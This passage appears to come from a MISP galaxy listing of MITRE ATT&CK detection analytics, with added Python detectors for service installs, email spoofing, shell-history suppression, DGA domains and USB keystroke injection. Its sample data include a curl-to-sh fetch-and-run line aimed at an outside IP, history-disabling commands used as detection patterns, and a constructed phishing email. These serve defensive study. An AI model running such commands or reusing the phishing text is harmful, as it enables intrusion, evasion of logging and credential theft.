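SC_BINPATH = re.compile(r'\bsc(?:\.exe)?\s+(?:create|config)\b.*?\bbinpath=\s*(?:"([^"]*)"|(\S+))', re.I)
NEW_SERVICE = re.compile(r'''\bNew-Service\b.*?-BinaryPathName\s+(?:"([^"]*)"|'([^']*)'|(\S+))''', re.I)


def executable_from(raw):
    """First executable in a service command string, dropping any arguments after it."""
    exe = re.match(r'\s*"?(.*?\.exe)', raw, re.I)
    return exe.group(1) if exe else (raw.split() or [raw])[0]


def service_binary(cmdline):
    """Service binary named in an sc.exe create/config or New-Service command line, else None."""
    m = SC_BINPATH.search(cmdline) or NEW_SERVICE.search(cmdline)
    if not m:
        return None
    return executable_from(next(g for g in m.groups() if g is not None))


def path_findings(path):
    low = path.lower()
    name = PureWindowsPath(low).name
    findings = []
    if name in LOLBINS:
        findings.append(f"service binary is a script/LOLBin host: {name}")
    if low.startswith(WRITABLE_ROOTS):
        findings.append(f"service binary in user-writable location: {path}")
    elif not low.startswith(TRUSTED_ROOTS):
        findings.append(f"service binary outside trusted roots: {path}")
    return findings


def assess(event):
    """Findings for one process-creation event; empty when it is not a service install or looks normal."""
    path = service_binary(event["cmdline"])
    if path is None:
        return []
    findings = path_findings(path)
    parent = PureWindowsPath(event["parent"].lower()).name
    if parent in SUSPICIOUS_PARENTS:
        findings.append(f"service installed by unusual parent: {parent}")
    return findings


# Constructed System-log 7045 records; the same path checks apply to their ImagePath.
SAMPLE_7045 = [
    {"service": "updsvc", "image_path": r"C:\Users\Public\upd.exe", "start_type": "auto start"},
    {"service": "AcmeAgent", "image_path": r"C:\Program Files\Acme\agent.exe", "start_type": "auto start"},
]


def assess_installed_service(record):
    findings = path_findings(executable_from(record["image_path"]))
    if findings and record["start_type"] == "auto start":
        findings.append("autostart service: persists across reboots")
    return findings


if __name__ == "__main__":
    for e in SAMPLE_EVENTS:
        print(e["cmdline"], "->", assess(e))
    for r in SAMPLE_7045:
        print(r["service"], "->", assess_installed_service(r))
```

The 7045 path is the one to rely on when the install goes through the Service Control Manager API (ChangeServiceConfig, CreateService) rather than a command line, since no sc.exe process is created in that case; the registry write under HKLM\SYSTEM\CurrentControlSet\Services\<name>\ImagePath is the other place the same binary path shows up.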

Internal MISP references

UUID 9a65f8bc-1b81-4e05-8e8b-bfdb0d581213 which can be used as unique global reference for Analytic 1575 - AN1575 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1575
mitre_platforms ['Windows']

Analytic 1755 - AN1755

Network traffic analysis could reveal patterns of compromise if devices attempt to access unusual targets or resources. Application vetting may be able to identify applications that perform Discovery or utilize existing connectivity to remotely access hosts within an internal enterprise network.

Internal MISP references

UUID ee4ce869-6b88-46f8-829a-9838f7607a8f which can be used as unique global reference for Analytic 1755 - AN1755 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1755
mitre_platforms ['Android']

Analytic 1585 - AN1585

Execution of built-in or AppleScript-based system enumeration via arp, netstat, ping, and discovery of /etc/hosts contents.

Internal MISP references

UUID 80c7f835-116d-4fa1-817a-08965efef16c which can be used as unique global reference for Analytic 1585 - AN1585 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1585
mitre_platforms ['macOS']

Analytic 1558 - AN1558

Detection of unset HISTFILE or modified history variables in ESXi shell sessions. Correlation of suspicious shell sessions with no recorded commands despite active usage.

Internal MISP references

UUID 8ed1a27f-3a60-441d-b92d-dc7b086db459 which can be used as unique global reference for Analytic 1558 - AN1558 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1558
mitre_platforms ['ESXi']

Analytic 1595 - AN1595

Monitor for suspicious usage of driver enumeration utilities (driverquery.exe) or API calls such as EnumDeviceDrivers(). Registry queries against HKLM\SYSTEM\CurrentControlSet\Services and HardwareProfiles that are abnormal may also indicate attempts to discover installed drivers and services. Correlate command execution, process creation, and registry access to build a behavioral chain of driver discovery.

Internal MISP references

UUID 18e81e76-bae3-44c8-b573-dfd3564a00ad which can be used as unique global reference for Analytic 1595 - AN1595 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1595
mitre_platforms ['Windows']

Analytic 1955 - AN1955

Monitor and analyze traffic patterns and packet inspection associated with protocols that do not follow the expected protocol standards and traffic flows (e.g., extraneous packets that do not belong to established flows, gratuitous or anomalous traffic patterns, anomalous syntax or structure). Consider correlation with process monitoring and command-line data to detect anomalous process execution and command-line arguments associated with those traffic patterns (e.g., monitor for anomalous use of files that do not normally initiate connections for the respective protocols).

Depending on the specific method of phishing, the detections can vary. Monitor for suspicious email activity, such as numerous accounts receiving messages from a single unusual/unknown sender. Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing) When it comes to following links, monitor for references to uncategorized or known-bad sites. URL inspection within email (including expanding shortened links) can also help detect links leading to known malicious sites. Monitor social media traffic for suspicious activity, including messages requesting information as well as abnormal file or data transfers (especially those involving unknown or otherwise suspicious accounts).

Monitor call logs from corporate devices to identify patterns of potential voice phishing, such as calls to/from known malicious phone numbers. Monitor network data for uncommon data flows. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.
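As an added example (not MITRE's text or code), the Python below implements three of the email checks named above over constructed messages: DKIM+SPF results read from a gateway's Authentication-Results header and tested for relaxed DMARC-style alignment with the header From domain, detection of shortened links that need expanding before categorization, and a fan-out count of unknown senders reaching many recipients. It assumes the Authentication-Results header was added by your own trusted gateway; the shortener list, the sample messages and the delivery log are constructed for the example.

```python
import re
from collections import defaultdict
from email import message_from_string
from email.utils import parseaddr

SHORTENERS = {"bit.ly", "tinyurl.com", "t.co", "goo.gl", "is.gd"}   # constructed shortener list
URL_RE = re.compile(r"""https?://([^/\s>"']+)[^\s>"']*""")

# Constructed messages as an inbound gateway would hand them over. The first passes SPF and DKIM
# for the sending service's domain, but neither result aligns with the From domain it impersonates.
SPOOFED = """Return-Path: <bounce@mailer-cheap.example.net>
Authentication-Results: mx.corp.example; spf=pass smtp.mailfrom=mailer-cheap.example.net; dkim=pass header.d=mailer-cheap.example.net
From: "IT Helpdesk" <helpdesk@corp.example>
To: alice@corp.example
Subject: Password expiry notice

Your password expires today. Renew at http://bit.ly/3xyzabc before 5pm.
"""
LEGIT = """Return-Path: <helpdesk@corp.example>
Authentication-Results: mx.corp.example; spf=pass smtp.mailfrom=corp.example; dkim=pass header.d=corp.example
From: "IT Helpdesk" <helpdesk@corp.example>
To: alice@corp.example
Subject: Maintenance window

Mail will be unavailable Saturday 02:00-03:00. Details: https://intranet.corp.example/maint
"""


def _domain(addr):
    return parseaddr(addr)[1].rpartition("@")[2].lower()


def _aligned(authenticated, from_domain):
    """Relaxed alignment: the authenticated domain is the From domain or a subdomain of it."""
    return bool(authenticated) and (authenticated == from_domain or authenticated.endswith("." + from_domain))


def spoof_findings(raw):
    msg = message_from_string(raw)
    from_domain = _domain(msg.get("From", ""))
    auth = msg.get("Authentication-Results", "")
    spf = re.search(r"spf=(\w+)", auth)
    mailfrom = re.search(r"smtp\.mailfrom=([^;\s]+)", auth)
    dkim = re.search(r"dkim=(\w+)", auth)
    dkim_d = re.search(r"header\.d=([^;\s]+)", auth)
    spf_aligned = spf and spf.group(1) == "pass" and mailfrom and _aligned(mailfrom.group(1).lower(), from_domain)
    dkim_aligned = dkim and dkim.group(1) == "pass" and dkim_d and _aligned(dkim_d.group(1).lower(), from_domain)
    body = "" if msg.is_multipart() else msg.get_payload()
    shortened = [m.group(0) for m in URL_RE.finditer(body) if m.group(1).lower() in SHORTENERS]
    return {
        "from_domain": from_domain,
        "return_path_domain": _domain(msg.get("Return-Path", "")),
        "spf_aligned": bool(spf_aligned),
        "dkim_aligned": bool(dkim_aligned),
        "header_from_unauthenticated": not (spf_aligned or dkim_aligned),
        "shortened_links": shortened,
    }


# Constructed gateway delivery log: (sender, recipient) pairs.
SAMPLE_DELIVERIES = ([("newsletter@vendor.example", f"user{i}@corp.example") for i in range(5)]
                     + [("helpdesk@corp-example-support.com", f"user{i}@corp.example") for i in range(40)])
KNOWN_SENDERS = {"newsletter@vendor.example"}


def bulk_unknown_senders(deliveries, known=KNOWN_SENDERS, threshold=20):
    """Senders not on the known list that reached at least `threshold` distinct recipients."""
    recipients = defaultdict(set)
    for sender, rcpt in deliveries:
        recipients[sender].add(rcpt)
    return {s: len(r) for s, r in recipients.items() if s not in known and len(r) >= threshold}


if __name__ == "__main__":
    print(spoof_findings(SPOOFED))
    print(spoof_findings(LEGIT))
    print(bulk_unknown_senders(SAMPLE_DELIVERIES))
```

The point of the alignment check is that a spoofed message can legitimately pass SPF and DKIM for whatever domain actually sent it; what matters is whether either passing identity matches the domain the user sees in From. Strip any Authentication-Results header that arrives from outside before your gateway adds its own, or this check can be fed a forged result.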

Internal MISP references

UUID 663bba48-7043-4407-875f-59691655d13c which can be used as unique global reference for Analytic 1955 - AN1955 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1955
mitre_platforms ['PRE']

Analytic 1559 - AN1559

Detection of CLI commands that disable history logging such as 'no logging'. Anomalous lack of new commands in session logs while activity persists is a strong signal.
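The five history-suppression analytics above (AN1555 Linux, AN1556 macOS, AN1557 Windows, AN1558 ESXi, AN1559 network devices) share one detection shape: match the command that disables history, then look for sessions that keep running commands while the history file stays untouched. The Python below is an added example (not MITRE's code) that does both over constructed events. It uses the variables and cmdlets the analytics name plus `set +o history`, which has the same effect in bash; the event field names and sample hosts are assumptions for the example.

```python
import re

# Constructed sample command lines (not real telemetry); one event per observed command.
SAMPLE_EVENTS = [
    {"host": "web01", "platform": "linux",   "user": "deploy", "cmdline": "unset HISTFILE"},
    {"host": "web01", "platform": "linux",   "user": "deploy", "cmdline": "export HISTFILESIZE=0 HISTSIZE=0"},
    {"host": "mac02", "platform": "macos",   "user": "jane",   "cmdline": "HISTCONTROL=ignoreboth"},
    {"host": "esx01", "platform": "esxi",    "user": "root",   "cmdline": "export HISTFILE=/dev/null"},
    {"host": "win03", "platform": "windows", "user": "svc",    "cmdline": "Set-PSReadLineOption -HistorySaveStyle SaveNothing"},
    {"host": "win03", "platform": "windows", "user": "svc",    "cmdline": r"Set-PSReadLineOption -HistorySavePath C:\Windows\Temp\h.txt"},
    {"host": "rtr01", "platform": "network", "user": "admin",  "cmdline": "no logging"},
    {"host": "web01", "platform": "linux",   "user": "deploy", "cmdline": "export PATH=/usr/local/bin:$PATH"},
    {"host": "win03", "platform": "windows", "user": "svc",    "cmdline": "Set-PSReadLineOption -EditMode Emacs"},
]

# bash/zsh/ESXi shell: the variables named in the analytics, plus `set +o history`.
SHELL_RULES = [
    (re.compile(r"\bunset\s+HISTFILE\b"), "HISTFILE unset"),
    (re.compile(r"\bHISTFILE=(?:/dev/null|\"\"|''|(?=\s|$))"), "HISTFILE emptied or sent to /dev/null"),
    (re.compile(r"\bHIST(?:FILE)?SIZE=0\b"), "history size zeroed"),
    (re.compile(r"\bHISTCONTROL=\S*ignore(?:space|both)"), "HISTCONTROL hides leading-space commands"),
    (re.compile(r"\bset\s+\+o\s+history\b"), "history recording switched off"),
]
# PowerShell (PSReadLine) and network-device CLI rules.
POWERSHELL_RULES = [
    (re.compile(r"Set-PSReadLineOption\b.*-HistorySaveStyle\s+SaveNothing", re.I), "PSReadLine saving disabled"),
    (re.compile(r"Set-PSReadLineOption\b.*-HistorySavePath\s+\S+", re.I), "PSReadLine history path redirected"),
]
NETWORK_RULES = [(re.compile(r"^\s*no\s+logging\b"), "device logging disabled")]

RULES_BY_PLATFORM = {
    "linux": SHELL_RULES, "macos": SHELL_RULES, "esxi": SHELL_RULES,
    "windows": POWERSHELL_RULES, "network": NETWORK_RULES,
}


def classify(event):
    """Reasons this command line looks like history suppression; empty list when benign."""
    rules = RULES_BY_PLATFORM.get(event["platform"], [])
    return [reason for pattern, reason in rules if pattern.search(event["cmdline"])]


def detect_suppression(events):
    """Only the events that matched, each annotated with its reasons."""
    hits = []
    for event in events:
        reasons = classify(event)
        if reasons:
            hits.append(dict(event, reasons=reasons))
    return hits


# Second signal: sessions that ran commands but never wrote history. Constructed per-session
# counters (commands from process auditing, writes from file auditing on the history file).
SAMPLE_SESSIONS = [
    {"host": "web01", "user": "deploy", "commands": 42, "history_writes": 0},
    {"host": "web01", "user": "ops",    "commands": 10, "history_writes": 3},
    {"host": "esx01", "user": "root",   "commands": 0,  "history_writes": 0},
]


def silent_sessions(sessions, min_commands=5):
    """Sessions with real activity but no history-file writes at all."""
    return [s for s in sessions if s["commands"] >= min_commands and s["history_writes"] == 0]


if __name__ == "__main__":
    for hit in detect_suppression(SAMPLE_EVENTS):
        print(hit["host"], hit["user"], repr(hit["cmdline"]), "->", "; ".join(hit["reasons"]))
    for s in silent_sessions(SAMPLE_SESSIONS):
        print("silent session:", s["host"], s["user"])
```

One caveat decides whether the first function is usable at all: `unset`, `export` and `set` are shell builtins and never reach execve, so process-creation telemetry alone will not contain them. The command-line rules need a source that records what was typed (tty or keystroke auditing, PowerShell script block logging, device command accounting). The session-level check has no such dependency, which is why the analytics pair the two.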

Internal MISP references

UUID 77450309-6789-4025-9817-d908c4ac9e5b which can be used as unique global reference for Analytic 1559 - AN1559 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1559
mitre_platforms ['Network Devices']

Analytic 1566 - AN1566

Suspicious access to Microsoft Teams chat messages via eDiscovery, Graph API, or export methods after rare or compromised sign-in. Often associated with excessive file access, sensitive content review, or anomaly from expected user behavior.

Internal MISP references

UUID 0c833a56-ca8e-41d8-b79a-3f3c89c63a48 which can be used as unique global reference for Analytic 1566 - AN1566 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1566
mitre_platforms ['Office Suite']

Analytic 1665 - AN1665

The user can also inspect and modify the list of applications that have notification access through the device settings (e.g. Apps & notification -> Special app access -> Notification access). Application vetting services can look for applications requesting the BIND_NOTIFICATION_LISTENER_SERVICE permission in a service declaration.

Internal MISP references

UUID 462f9ed4-5b6b-4426-b383-cd331f2984c0 which can be used as unique global reference for Analytic 1665 - AN1665 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1665
mitre_platforms ['Android']

Analytic 1656 - AN1656

The user can view a list of device administrators and applications that have registered Accessibility services in device settings. Applications that register an Accessibility service or request device administrator permissions should be scrutinized further for malicious behavior. Application vetting services can look for applications that request permissions to Accessibility services or application overlay. Monitor for API calls that are related to GooglePlayServices.

Internal MISP references

UUID d86a141c-b4fa-48fd-a15b-2cd3254b3400 which can be used as unique global reference for Analytic 1656 - AN1656 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1656
mitre_platforms ['Android']

Analytic 1567 - AN1567

Detects suspicious USB HID device enumeration and keystroke injection patterns, such as rapid sequences of input with no user context, scripts executed through simulated keystrokes, or rogue devices presenting themselves as keyboards.

Internal MISP references

UUID 0f05915c-e146-4921-840b-1a08774ca4d2 which can be used as unique global reference for Analytic 1567 - AN1567 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1567
mitre_platforms ['Windows']

Analytic 1576 - AN1576

Detects creation or modification of systemd service units, addition of cron jobs that invoke binaries on boot, or suspicious writes to /etc/init.d/. Monitors chmod +x and systemctl execution paths, especially from non-root parent processes.

Internal MISP references

UUID 9a73d14c-ce3c-47c5-a6c2-3d6b49c4d009 which can be used as unique global reference for Analytic 1576 - AN1576 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1576
mitre_platforms ['Linux']

Analytic 1756 - AN1756

Network traffic analysis could reveal patterns of compromise if devices attempt to access unusual targets or resources. Application vetting may be able to identify applications that perform Discovery or utilize existing connectivity to remotely access hosts within an internal enterprise network.

Internal MISP references

UUID 6d2d8aff-7d23-40bc-bc29-54852baed5f1 which can be used as unique global reference for Analytic 1756 - AN1756 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1756
mitre_platforms ['iOS']

Analytic 1675 - AN1675

Many properly configured firewalls may naturally block command and control traffic. Application vetting services may provide a list of connections made or received by an application, or a list of domains contacted by the application.

Internal MISP references

UUID 8503331d-09f5-49d3-838c-f0d3b1d55e30 which can be used as unique global reference for Analytic 1675 - AN1675 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1675
mitre_platforms ['Android']

Analytic 1765 - AN1765

Monitor for pseudo-randomly generated domain names based on frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more.(Citation: Data Driven Security DGA) Additionally, check if the suspicious domain has been recently registered, if it has been rarely visited, or if the domain had a spike in activity after being dormant.(Citation: unit42_strat_aged_domain_det) Content delivery network (CDN) domains may trigger these detections due to the format of their domain names.
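The following Python is an added example (not MITRE's code, and not the cited papers' implementations) that computes the lexical features listed above for the registrable label of a domain, adds the two behavioural checks (recent registration, rarely visited) from constructed lookup data, and applies the CDN caveat as an explicit allowlist. The tiny word list, the CDN suffixes, the thresholds and the scoring are assumptions chosen for the example; a deployment would use a real dictionary and a public-suffix list.

```python
import math
import re
from collections import Counter

# Constructed word list and CDN allowlist for the example only.
WORDS = {"secure", "login", "update", "google", "mail", "cloud", "front", "bank", "account", "support",
         "service", "news", "shop", "static", "content", "portal", "api", "cdn"}
CDN_SUFFIXES = (".cloudfront.net", ".akamaiedge.net", ".azureedge.net", ".fastly.net")
VOWELS = set("aeiou")


def registrable_label(domain):
    """Second-level label ('example' for 'a.b.example.com'); assumes single-label TLDs."""
    parts = domain.lower().strip(".").split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]


def shannon_entropy(s):
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values()) if n else 0.0


def dictionary_coverage(s):
    """Fraction of characters explained by greedy longest-match against WORDS (3+ letters)."""
    i, covered = 0, 0
    while i < len(s):
        for length in range(min(12, len(s) - i), 2, -1):
            if s[i:i + length] in WORDS:
                covered += length
                i += length
                break
        else:
            i += 1
    return covered / len(s) if s else 0.0


def longest_consonant_run(s):
    return max((len(r) for r in re.findall(r"[b-df-hj-np-tv-z]+", s)), default=0)


def dga_score(domain, stats=None):
    """(score, reasons) for one domain; each lexical or behavioural signal adds one point."""
    if domain.lower().endswith(CDN_SUFFIXES):
        return 0, ["known CDN suffix: random-looking labels are expected here"]
    core = re.sub(r"[^a-z0-9]", "", registrable_label(domain))
    letters = [c for c in core if c.isalpha()]
    reasons = []
    if len(core) >= 12:
        reasons.append(f"long label ({len(core)} chars)")
    if shannon_entropy(core) >= 3.5:
        reasons.append(f"high entropy ({shannon_entropy(core):.2f} bits/char)")
    if letters and sum(c in VOWELS for c in letters) / len(letters) < 0.25:
        reasons.append("few vowels")
    if dictionary_coverage(core) < 0.4:
        reasons.append("mostly non-dictionary characters")
    if core and sum(c.isdigit() for c in core) / len(core) > 0.2:
        reasons.append("digit-heavy")
    if longest_consonant_run(core) >= 4:
        reasons.append("unpronounceable consonant run")
    if stats:   # constructed registration / passive-DNS style context
        if stats.get("registered_days_ago", 10**6) < 30:
            reasons.append("registered less than 30 days ago")
        if stats.get("visits_last_30d", 10**6) <= 2:
            reasons.append("rarely visited in this environment")
    return len(reasons), reasons


def is_dga_like(domain, stats=None, threshold=4):
    return dga_score(domain, stats)[0] >= threshold


if __name__ == "__main__":
    for d in ("xk3qz9vb7ptlw.com", "mail.google.com", "secure-login-update.net", "d3k2m9x7q1lpw.cloudfront.net"):
        print(d, dga_score(d, {"registered_days_ago": 4, "visits_last_30d": 1} if d.startswith("xk3") else None))
```

Note what the run on secure-login-update.net shows: a word-based phishing domain is long and has high character entropy, yet scores below the threshold because dictionary coverage and vowel ratio look normal. That is the right outcome for a DGA detector; such domains belong to the registration-age and categorization checks, not to this one.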

Internal MISP references

UUID a088cd64-106e-4fe2-a004-5796c574cfd0 which can be used as unique global reference for Analytic 1765 - AN1765 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1765
mitre_platforms ['Android']

Analytic 1657 - AN1657

Command-line activities can potentially be detected through Mobile Threat Defense (MTD) integrations with lower-level OS APIs. This could grant MTD agents access to running and newly created processes and their parameters, potentially detecting unwanted or malicious shells. Application vetting services could detect the invocations of methods that could be used to execute shell commands.(Citation: Samsung Knox Mobile Threat Defense)

Internal MISP references

UUID f2c74903-6770-4f55-9a11-edcf6e00938e which can be used as unique global reference for Analytic 1657 - AN1657 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1657
mitre_platforms ['Android']

Analytic 1586 - AN1586

ESXi shell or SSH access issuing esxcli network diag ping or viewing routing tables to identify connected hosts.

Internal MISP references

UUID 88041144-900d-4968-9e8a-8f1f63ae8417 which can be used as unique global reference for Analytic 1586 - AN1586 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1586
mitre_platforms ['ESXi']

Analytic 1568 - AN1568

Detects USB HID device enumeration under /sys/bus/usb/devices/ and rapid keystroke injection resulting in command execution such as bash or Python scripts launched without interactive user activity.

Internal MISP references

UUID b61673d6-244f-4888-9370-1a3ef391a6c2 which can be used as unique global reference for Analytic 1568 - AN1568 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1568
mitre_platforms ['Linux']

Analytic 1685 - AN1685

Application vetting services could look for misuse of dynamic libraries.

Internal MISP references

UUID 50a9f608-68aa-4bf2-b24d-2a22f2a96db4 which can be used as unique global reference for Analytic 1685 - AN1685 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1685
mitre_platforms ['Android']

Analytic 1658 - AN1658

Command-line activities can potentially be detected through Mobile Threat Defense (MTD) integrations with lower-level OS APIs. This could grant MTD agents access to running and newly created processes and their parameters, potentially detecting unwanted or malicious shells. Application vetting services could detect the invocations of methods that could be used to execute shell commands.(Citation: Samsung Knox Mobile Threat Defense)

Internal MISP references

UUID 649ee05c-9f09-47fc-802a-7df2ce362563 which can be used as unique global reference for Analytic 1658 - AN1658 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1658
mitre_platforms ['iOS']

Analytic 1965 - AN1965

Consider analyzing self-signed code signing certificates for features that may be associated with the adversary and/or their developers, such as the thumbprint, algorithm used, validity period, and common name. Malware repositories can also be used to identify additional samples associated with the adversary and identify patterns an adversary has used in crafting self-signed code signing certificates. Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related follow-on behavior, such as Code Signing or Install Root Certificate.

Internal MISP references

UUID 0922c3e9-26fb-4330-8d7a-2b9a4661db88 which can be used as unique global reference for Analytic 1965 - AN1965 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1965
mitre_platforms ['PRE']

Analytic 1569 - AN1569

Detects abnormal HID device enumeration via I/O Registry (ioreg -p IOUSB) and keystroke injection targeting AppleScript, osascript, or PowerShell equivalents. Defender correlates new USB device connections with rapid script execution.
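The three keystroke-injection analytics (AN1567 Windows, AN1568 Linux, AN1569 macOS) rest on the same correlation: a newly attached HID device, followed within seconds by typing no human can produce and by a script host starting. The Python below is an added example (not MITRE's code) of that correlation over a constructed event stream; the event fields, the keyboard allowlist, the script-host list, the 10 ms/180 ms spacings and the thresholds are assumptions for the example.

```python
import re
from statistics import median

# Constructed allowlist of (vendor, product) IDs for issued keyboards, and script hosts a payload typically calls.
APPROVED_KEYBOARDS = {("05ac", "0250")}
SCRIPT_HOSTS = {"osascript", "bash", "sh", "zsh", "python3", "powershell", "powershell.exe", "pwsh", "cmd.exe"}

# Constructed event stream: USB attach events, one timestamp per keystroke, and process launches.
SAMPLE_EVENTS = [
    {"t": 0.0, "type": "usb_attach", "usb_class": "HID", "vendor": "1d50", "product": "6122", "name": "USB Keyboard"},
    *[{"t": 0.5 + i * 0.01, "type": "key"} for i in range(80)],          # 80 keys, 10 ms apart
    {"t": 1.4, "type": "exec", "cmdline": "osascript -e 'do shell script \"curl -s http://198.51.100.7/p | sh\"'"},
    {"t": 60.0, "type": "usb_attach", "usb_class": "HID", "vendor": "05ac", "product": "0250", "name": "Apple Keyboard"},
    *[{"t": 61.0 + i * 0.18, "type": "key"} for i in range(30)],         # human-speed typing
    {"t": 70.0, "type": "exec", "cmdline": "ls -la"},
]


def _image_name(cmdline):
    """Basename of the launched program, accepting both / and \\ separators."""
    return re.split(r"[\\/]", cmdline.split()[0])[-1]


def keystroke_injection_alerts(events, window=10.0, min_keys=40, max_median_gap=0.03):
    """One alert per newly attached HID device whose first `window` seconds contain a superhuman keystroke burst."""
    alerts = []
    for dev in (e for e in events if e["type"] == "usb_attach" and e["usb_class"] == "HID"):
        t0, t1 = dev["t"], dev["t"] + window
        keys = sorted(e["t"] for e in events if e["type"] == "key" and t0 <= e["t"] <= t1)
        hosts = [_image_name(e["cmdline"]) for e in events if e["type"] == "exec" and t0 <= e["t"] <= t1]
        if len(keys) < min_keys:
            continue
        gaps = [b - a for a, b in zip(keys, keys[1:])]
        if median(gaps) > max_median_gap:
            continue                      # plausibly a person typing
        reasons = [f"{len(keys)} keystrokes with median gap {median(gaps) * 1000:.0f} ms (faster than a human)"]
        if (dev["vendor"], dev["product"]) not in APPROVED_KEYBOARDS:
            reasons.append(f"unapproved keyboard {dev['vendor']}:{dev['product']}")
        launched = [h for h in hosts if h in SCRIPT_HOSTS]
        if launched:
            reasons.append(f"script host launched during burst: {', '.join(launched)}")
        alerts.append({"device": dev["name"], "t": dev["t"], "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for a in keystroke_injection_alerts(SAMPLE_EVENTS):
        print(a)
```

The keystroke timing is the load-bearing signal; the allowlist and script-host checks only add confidence, because an injected payload is free to spoof a whitelisted vendor/product ID. On macOS the attach event is what `ioreg -p IOUSB` or a USB attach notification gives you; on Linux the same device shows up under /sys/bus/usb/devices/ with bInterfaceClass 03 (HID).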

Internal MISP references

UUID 4b47697b-ff9b-4af7-a079-d34210cebdab which can be used as unique global reference for Analytic 1569 - AN1569 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1569
mitre_platforms ['macOS']

Analytic 1956 - AN1956

If infrastructure or patterns in malware have been previously identified, internet scanning may uncover when an adversary has staged malware to make it accessible for targeting. Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle, such as User Execution or Ingress Tool Transfer.

Internal MISP references

UUID 4ef6c517-011e-4155-897f-e86cea5824b4 which can be used as unique global reference for Analytic 1956 - AN1956 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1956
mitre_platforms ['PRE']

Analytic 1596 - AN1596

Detect attempts to enumerate kernel modules through lsmod, modinfo, or inspection of /proc/modules and /dev entries. Focus on unusual execution contexts such as unprivileged users or processes outside expected administrative workflows.

Internal MISP references

UUID b55c3339-2d4c-4392-8d26-c257ea2f1bb9 which can be used as unique global reference for Analytic 1596 - AN1596 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1596
mitre_platforms ['Linux']

Analytic 1659 - AN1659

On Android, the user can review which applications can use premium SMS features in the "Special access" page within application settings. Application vetting services can detect when applications request the SEND_SMS permission, which should be infrequently used.

Internal MISP references

UUID 5c280910-f7cf-4e7a-9b99-a592115dbc8b which can be used as unique global reference for Analytic 1659 - AN1659 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1659
mitre_platforms ['Android']

Analytic 1695 - AN1695

On Android, the user can review which applications have Device Administrator access in the device settings and revoke permission where appropriate. Application vetting services can detect and closely scrutinize applications that utilize Device Administrator access.

Internal MISP references

UUID e1db1813-109f-4f24-87e3-5d7b5e506dd3 which can be used as unique global reference for Analytic 1695 - AN1695 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1695
mitre_platforms ['Android']

Analytic 1577 - AN1577

Detects creation or modification of LaunchDaemon or LaunchAgent plist files under /Library/LaunchDaemons/, ~/Library/LaunchAgents/, or similar. Monitors execution of launchctl, property list edits, and file permission changes.

Internal MISP references

UUID f315abd4-7115-45ac-9466-64c23367cd41 which can be used as unique global reference for Analytic 1577 - AN1577 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1577
mitre_platforms ['macOS']

Analytic 1775 - AN1775

Application vetting services could look for android.permission.READ_CALENDAR or android.permission.WRITE_CALENDAR in an Android application’s manifest, or NSCalendarsUsageDescription in an iOS application’s Info.plist file. Most applications do not need calendar access, so extra scrutiny could be applied to those that request it. On both Android and iOS, the user can manage which applications have permission to access calendar information through the device settings screen and revoke the permission if necessary.

Internal MISP references

UUID abfa1de9-fcf5-44da-a910-f83273b60813 which can be used as unique global reference for Analytic 1775 - AN1775 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1775
mitre_platforms ['iOS']

Analytic 1757 - AN1757

Mobile security products can potentially detect jailbroken devices. Application vetting services may be able to detect known privilege escalation exploits contained within applications, as well as searching application packages for strings that correlate to known password store locations.

Internal MISP references

UUID b2ef244c-b230-4c2b-b0a6-070e5c376f32 which can be used as unique global reference for Analytic 1757 - AN1757 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1757
mitre_platforms ['iOS']

Analytic 1578 - AN1578

Detects creation of new container system processes via docker run --restart, kubectl exec to init containers, or modification of container init specs. Flags container images that override entrypoints to embed persistence behaviors.

Internal MISP references

